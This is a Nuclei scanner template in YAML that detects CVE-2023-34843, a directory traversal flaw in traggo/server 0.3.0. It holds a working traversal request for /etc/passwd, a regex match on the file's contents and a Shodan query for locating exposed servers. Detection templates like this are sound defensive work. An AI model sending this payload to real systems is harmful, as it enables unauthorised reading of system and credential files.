37 lines
729 B
YAML
37 lines
729 B
YAML
id: CVE-2023-34843
|
|
|
|
info:
|
|
name: Traggo Server - Local File Inclusion
|
|
author: DhiyaneshDk
|
|
severity: high
|
|
description: |
|
|
traggo/server version 0.3.0 is vulnerable to directory traversal.
|
|
reference:
|
|
- https://github.com/rootd4ddy/CVE-2023-34843
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
shodan-query: html:"traggo"
|
|
tags: cve,cve2023,traggo,lfi,server
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0"
|
|
|
|
- type: word
|
|
words:
|
|
- text/plain
|
|
part: header
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|